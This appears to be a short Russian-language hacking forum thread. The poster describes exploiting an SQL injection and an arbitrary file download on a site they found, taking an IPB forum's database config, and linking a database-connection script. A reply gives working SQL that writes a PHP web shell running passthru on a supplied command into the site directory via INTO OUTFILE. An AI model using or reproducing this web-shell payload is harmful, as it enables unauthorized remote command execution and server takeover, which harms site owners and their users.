Значит нашел сайт с sql инъекцией, составил запрос ошибок не возникает, но результат в браузер не выводиться. В чем тут может быть проблема? Еще есть возможность скачивать ЛЮБЫЕ файлы с сервака с помощью кривого скрипта!!!! Скачать значит файл с настройками базы от форума IPB. Скачал скрипт - rst.void.ru/download/sql.rar для коннекта к базе! Он успешно подсоединяеться, но опять же в браузере пусто!! (( Помогите советом!
Вот ща еще мысль пришла! Как выполнить команду на сервере (допустим ls -al) посредством sql инъекции и возможно это вообще?
Для этого есть поиск.Вот код: Code: CREATE TABLE `shell` (s TEXT); INSERT INTO `shell` values ('<? passthru("$cmd"); ?>'); SELECT `s` INTO OUTFILE '/полный/путь/к/сайту/шелл.php' FROM `shell`; DROP TABLE `shell`; Закрыта.
